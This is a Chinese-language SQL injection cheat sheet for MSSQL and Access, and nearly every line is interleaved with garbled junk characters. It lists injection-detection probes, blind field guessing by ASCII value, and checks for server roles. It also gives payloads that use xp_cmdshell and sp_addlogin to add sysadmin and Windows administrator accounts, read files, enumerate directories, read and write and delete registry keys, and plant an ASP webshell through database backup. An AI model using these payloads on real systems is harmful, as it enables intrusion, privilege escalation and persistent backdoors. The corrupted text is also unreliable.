1.判断是否有注入;and 1=1 ;and 1=2 �(F�
+�if�
2.初步判断是否是mssql ;and user>0 JEGcZ�e�q)
�
jI��[:`�
3.注入参数是字符'and [查询条件] and ''=' B/�&axm%�0
[�?y�OJU%`
4.搜索时没过滤参数的'and [查询条件] and '%25'=' gs7H�9%j{U
vH9�/�}w�2
5.判断数据库系统 Lr V)}1�&5
/!ux��P~2U
;and (select count(*) from sysobjects)>0 mssql �Rq<�T2}K�
�eZk�
[6H�
;and (select count(*) from msysobjects)>0 access 7��?dB&m6W
�dq[j.Nm�q
JY~��s-jxa
/k l0�(=�'
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��\M'�b�%
�����\|�L@
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �\��2�*<Pq
�)W(?wv!�,
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 1�)X%n)2pr
�
3_+-�t�5
9.(1)猜字段的ascii值(access) `[2nxP>w�`
1��.]�#FJe
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ��R�4%!W~K
&1�{RuV�&t
(2)猜字段的ascii值(mssql) :I1��)=8lO
�#sw�zZyM$
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �3#��j�%F�
.T��Sj��8,
10.测试权限结构(mssql) n'U*8��I�D
H��J:s)�As
HBXp#�$dPc
_A;jtS�)SY
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- l%oie1g �l
r*OSEz�GUz
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- y�9?B�vPp+
��o5-oQ_�j
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �7A��X<>^�
/xWkP��{��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- t:9}~��%�~
g�~S>_~WL�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Eo!1
WRruF
�
e%afK@c�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- tK`s�Vsm>
D\�jRF�-z�
;and 1=(select IS_MEMBER('db_owner'));-- .��R#p<"$I
kS%FV�;9>(
G29PdmY$<
O�$�V
6QJ�
11.添加mssql和系统的帐户 ={o>g��'��
s�=�!
y%�
;exec master.dbo.sp_addlogin username;-- <=���l!~~%
;exec master.dbo.sp_password null,username,password;-- qH: `
O�%,
snK�$? 9vh
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Zm�>Q-7r9
k3��da*vwE
;exec master.dbo.xp_cmdshell 'net user username password \SHYwD}*Pr
<�!v�^�Df
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ��y+)][Wa0
3?|Fn8dQR.
;exec master.dbo.xp_cmdshell 'net user username password /add';-- T�2P0(rEz�
!�k�)}p_�e
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- rp6Y�&3�p.
>JkQ��U� e
b�c}U &�X<
vRpMZ)�e�
12.(1)遍历目录 �cZuZfM�DM
(�w�dE@�/V
;create table dirs(paths varchar(100), id int) R�Y�8;bUSR
`(vgBz�`e[
;insert dirs exec master.dbo.xp_dirtree 'c:\' �x��}[/A;N
|"8Az0[��!
;and (select top 1 paths from dirs)>0 $W<H�[k&(B
dE7� kd=.o
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) [rC-3sGar�
B;��r�� U
Kd�HR.��;*
r :{2}nE��
(2)遍历目录 ���9x0B9&
(�\��{9�W�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- AyB-+�oTf(
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 F�#Ux�l%�h
v`�A^6)U#M
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 bHH{bv�~�Z
%*w�JODtB|
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 "
;_bB"q�*
!@{���_Qt1
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �1&���\_|2
G�NS5v-"�H
[u��;]�J*�
�IAf,T�Kfe
13.mssql中的存储过程 %�6j|/|#]
@vh3S�+�=M
xp_regenumvalues 注册表根键, 子键 \$�}xt`�6p
O�h9wBV��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 V�@&zn��8?
^n!�{ vHz
xp_regread 根键,子键,键值名 �iJv4%|�9�
�Z�$ F�h4�
;exec xp_regread >��*(4evU�
UK�*+E��Ev
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 S5*wUd*p#�
.�^>[@w��3
xp_regwrite 根键,子键, 值名, 值类型, 值
m(,vym��t
0AP��wk
�}
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 L� M���C-1
PwU}<Hr�l]
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �zNo�fI�$U
��3Be�e6N>
xp_regdeletevalue 根键,子键,值名 �H=?v$!
�i
0�60<wj�X6
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �l~!T�np\M
~�
nNsq(4
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �_�6Wz1.]n
H�K)�$��ls
%�Rj:r!XB:
�W?mn8Y;{`
14.mssql的backup创建webshell �-|�B?p�R
�g��RIRc4p
use model t�uo'4�%]i
lBqu}88q0
create table cmd(str image); s
Z(LT'}��
2hdi)C,7Y
insert into cmd(str) values (''); O U���l+es
�M,"4r^%k�
backup database model to disk='c:\l.asp'; _m;��0%]+�
E�KZ4��0z`
�X�L �c&�7
zuUf:%k}I�
15.mssql内置函数 ;ZPA�nd:pb
�.%�_scNP
;and (select @@version)>0 获得Windows的版本号 $%Z�EP�>�]
X&nk�c/erx
;and user_name()='dbo' 判断当前系统的连接用户是不是sa %Ez%pT0TQ#
O|m-Uz�"�+
;and (select user_name())>0 爆当前系统的连接用户 Zy,�U'�Dv�
`=Pn{Ja�D
;and (select db_name())>0 得到当前连接的数据库 ���+6�@".<
I�~�y�[8
3C� 84b/A�
�,uq�Sq�
16.简洁的webshell AX}l~
�s�v
zk=�5uKcPE
use model �9#{?��*c6
gm~Ka%O�|F
create table cmd(str image); N���X&mEz
km,}7^?F0r
insert into cmd(str) values (''); Z�fM�(%rx�
y5B4t6M�(
backup database model to disk='g:\wwwtest\l.asp';
